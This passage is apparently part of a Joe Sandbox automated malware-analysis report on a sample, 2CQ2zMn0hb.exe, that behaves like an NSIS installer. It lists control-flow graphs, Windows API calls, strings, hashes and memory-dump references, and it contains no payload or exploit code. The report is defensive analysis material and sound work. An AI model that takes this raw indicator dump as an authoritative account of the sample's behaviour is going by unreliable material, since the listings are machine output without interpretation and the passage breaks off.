                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-3853389976
                                                                                                              • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 446 4031cf-4031d3 443->446 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->446 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 491 4030df-4030e5 462->491 488 403139-40313e 463->488 489 40314d-40317d call 40345d call 4031d6 463->489 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 487 40300e-403015 470->487 473->474 479 403087-403095 call 4068b5 474->479 480 403098-4030a2 474->480 479->480 480->452 480->453 487->474 490 403017-40301e 487->490 488->446 500 403182-403185 489->500 490->474 493 403020-403027 490->493 491->459 491->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->446
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\2CQ2zMn0hb.exe,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\2CQ2zMn0hb.exe,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\2CQ2zMn0hb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-3172971329
                                                                                                              • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 518 406457-40645e 514->518 516 406662-40666d 515->516 517 406463-406470 515->517 520 406678-406679 516->520 521 40666f-406673 call 4063e8 516->521 517->516 519 406476-406482 517->519 518->515 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 536 4064f7-4064fe 529->536 530->529 533 4064e0-4064e3 530->533 534 406602-40660e call 4063e8 531->534 535 4065f4-406600 call 40632f 531->535 537 406630-406641 lstrlenW 532->537 538 406623-40662b call 40640a 532->538 533->529 540 4064e5-4064e8 533->540 549 406613-406619 534->549 535->549 542 406500-406502 536->542 543 406503-406505 536->543 537->515 538->537 540->529 545 4064ea-4064ee 540->545 542->543 547 406540-406543 543->547 548 406507-40652e call 4062b6 543->548 545->536 550 406553-406556 547->550 551 406545-406551 GetSystemDirectoryW 547->551 561 406534-40653b call 40640a 548->561 562 4065ce-4065d1 548->562 549->537 553 40661b 549->553 555 4065c1-4065c3 550->555 556 406558-406566 GetWindowsDirectoryW 550->556 554 4065c5-4065c9 551->554 558 4065de-4065e4 call 40667c 553->558 554->558 563 4065cb 554->563 555->554 560 406568-406572 555->560 556->555 558->537 566 406574-406577 560->566 567 40658c-4065a2 SHGetSpecialFolderLocation 560->567 561->554 562->558 564 4065d3-4065d9 lstrcatW 562->564 563->562 564->558 566->567 570 406579-406580 566->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 567->571 572 4065bd 567->572 573 406588-40658a 570->573 571->554 571->572 572->555 573->554 573->567
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-1230650788
                                                                                                              • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 650 4017b5-4017b6 call 40667c 643->650 644->650 653 4017bb-4017bf 650->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 701 401864-401865 667->701 678 401882-401888 668->678 682 402ace 678->682 680->681 684 4018d0-4018db CloseHandle 680->684 681->684 686 402ad0-402ad4 682->686 687 4018e1-4018e4 684->687 688 402ac5-402ac8 684->688 690 4018e6-4018f7 call 40640a lstrcatW 687->690 691 4018f9-4018fc call 40640a 687->691 688->682 696 401901-4022fc call 405a4e 690->696 691->696 696->686 701->678 703 401867-401868 701->703 703->668
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp$C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll$Call
                                                                                                              • API String ID: 1941528284-2567469237
                                                                                                              • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 712 4027dc-4027e4 711->712 713 40267e-40268d call 406348 711->713 712->707 713->712 717 402693 713->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 722 402737-40273a 719->722 723 40274d-40275d call 405f61 719->723 720->712 721 4026c4-4026c9 720->721 721->712 726 4026cf-4026dd 721->726 722->723 724 40273c-402747 call 405fbf 722->724 723->712 732 40275f 723->732 724->712 724->723 729 4026e3-4026f5 MultiByteToWideChar 726->729 730 402798-4027a4 call 40632f 726->730 729->732 733 4026f7-4026fa 729->733 730->709 735 402762-402765 732->735 736 4026fc-402707 733->736 735->730 738 402767-40276c 735->738 736->735 739 402709-40272e SetFilePointer MultiByteToWideChar 736->739 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->736 742 402730 739->742 743 4027ca-4027d6 SetFilePointer 740->743 744 4027af-4027b3 740->744 741->740 745 402775-402788 741->745 742->732 743->712 746 4027b5-4027b9 744->746 747 4027bb-4027c8 744->747 745->712 748 40278a-402790 745->748 746->743 746->747 747->712 748->718 749 402796 748->749 749->712
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 757 6f971777-6f9717b6 call 6f971b5f 761 6f9718d6-6f9718d8 757->761 762 6f9717bc-6f9717c0 757->762 763 6f9717c2-6f9717c8 call 6f972352 762->763 764 6f9717c9-6f9717d6 call 6f972394 762->764 763->764 769 6f971806-6f97180d 764->769 770 6f9717d8-6f9717dd 764->770 771 6f97180f-6f97182b call 6f972569 call 6f9715b4 call 6f971272 GlobalFree 769->771 772 6f97182d-6f971831 769->772 773 6f9717df-6f9717e0 770->773 774 6f9717f8-6f9717fb 770->774 794 6f971885-6f971889 771->794 778 6f971833-6f97187c call 6f9715c6 call 6f972569 772->778 779 6f97187e-6f971884 call 6f972569 772->779 776 6f9717e2-6f9717e3 773->776 777 6f9717e8-6f9717e9 call 6f972aac 773->777 774->769 780 6f9717fd-6f9717fe call 6f972d37 774->780 782 6f9717e5-6f9717e6 776->782 783 6f9717f0-6f9717f6 call 6f972724 776->783 790 6f9717ee 777->790 778->794 779->794 793 6f971803 780->793 782->769 782->777 798 6f971805 783->798 790->793 793->798 799 6f9718c6-6f9718cd 794->799 800 6f97188b-6f971899 call 6f97252c 794->800 798->769 799->761 805 6f9718cf-6f9718d0 GlobalFree 799->805 807 6f9718b1-6f9718b8 800->807 808 6f97189b-6f97189e 800->808 805->761 807->799 810 6f9718ba-6f9718c5 call 6f97153d 807->810 808->807 809 6f9718a0-6f9718a8 808->809 809->807 811 6f9718aa-6f9718ab FreeLibrary 809->811 810->799 811->807
                                                                                                              APIs
                                                                                                                • Part of subcall function 6F971B5F: GlobalFree.KERNEL32(?), ref: 6F971DB2
                                                                                                                • Part of subcall function 6F971B5F: GlobalFree.KERNEL32(?), ref: 6F971DB7
                                                                                                                • Part of subcall function 6F971B5F: GlobalFree.KERNEL32(?), ref: 6F971DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F971825
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6F9718AB
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F9718D0
                                                                                                                • Part of subcall function 6F972352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F972383
                                                                                                                • Part of subcall function 6F972724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9717F6,00000000), ref: 6F9727F4
                                                                                                                • Part of subcall function 6F9715C6: wsprintfW.USER32 ref: 6F9715F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                              • Opcode ID: 98cf4bc7d0d0811cdacfc0dace6839f4a3588605fbbab9c97c3218cfca29b612
                                                                                                              • Instruction ID: f29ef8b62a0f2929495e6fe6dce7384869c250fdf5b21c61945888d6754e71ad
                                                                                                              • Opcode Fuzzy Hash: 98cf4bc7d0d0811cdacfc0dace6839f4a3588605fbbab9c97c3218cfca29b612
                                                                                                              • Instruction Fuzzy Hash: A241BC715003049BEB388F7898A4BC677ECBF07324F044566E9199A1D7DFB8E1C48B60

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 823 402427-402434 call 402c41 lstrlenW 822->823 824 402438-40243b 822->824 823->824 827 40243d-40244e call 402c1f 824->827 828 40244f-402452 824->828 827->828 832 402463-402477 RegSetValueExW 828->832 833 402454-40245e call 4031d6 828->833 836 402479 832->836 837 40247c-40255d RegCloseKey 832->837 833->832 836->837 837->821 839 40288b-402892 837->839 839->821
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseValuelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp
                                                                                                              • API String ID: 2655323295-2551704783
                                                                                                              • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                              • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                              Control-flow Graph

